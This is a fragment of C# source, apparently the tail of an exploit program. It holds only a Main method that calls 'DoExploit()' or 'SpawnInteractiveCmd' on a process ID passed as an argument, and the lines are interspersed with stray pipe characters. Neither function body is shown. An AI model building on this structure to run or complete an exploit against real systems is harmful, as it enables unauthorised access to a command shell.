static void Main(string[] args)
|
||
{
|
||
try
|
||
{
|
||
if (args.Length > 0)
|
||
{
|
||
SpawnInteractiveCmd(int.Parse(args[0]));
|
||
}
|
||
else
|
||
{
|
||
DoExploit();
|
||
}
|
||
}
|
||
catch (Exception ex)
|
||
{
|
||
Console.WriteLine(ex.Message);
|
||
}
|
||
}
|
||
}
|
||
} |